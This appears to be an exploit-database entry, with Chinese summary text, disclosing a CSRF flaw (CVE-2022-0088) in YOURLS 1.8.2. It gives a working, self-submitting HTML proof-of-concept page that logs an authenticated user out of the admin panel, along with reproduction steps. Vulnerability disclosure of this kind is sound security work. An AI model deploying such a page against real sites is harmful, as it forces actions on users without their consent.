本文详细介绍了YOURLS 1.8.2版本中存在的跨站请求伪造(CSRF)漏洞(CVE-2022-0088),并提供了完整的漏洞概念验证(PoC)代码和复现步骤,展示了如何利用该漏洞在用户不知情的情况下执行登出操作。
Exploit Title: YOURLS 1.8.2 - Cross-Site Request Forgery (CSRF)
Date: 2025-11-25
Exploit Author: CodeSecLab
Version: 1.8.2
Tested on: Windows
CVE : CVE-2022-0088
Proof Of Concept
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>
<h1>CSRF Proof of Concept</h1>
<form action="http://yourls/admin/index.php" method="GET">
<input type="hidden" name="action" value="logout">
<input type="submit" value="Submit CSRF Request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
|
当已认证的漏洞应用用户访问此HTML页面时,页面将自动提交一个请求,在不经用户同意的情况下将其登出,从而演示了该CSRF漏洞。
Steps to Reproduce
- 将上述代码保存为
poc.html。
- 登录你的YOURLS应用,并在同一浏览器中打开该文件。
- 观察结果。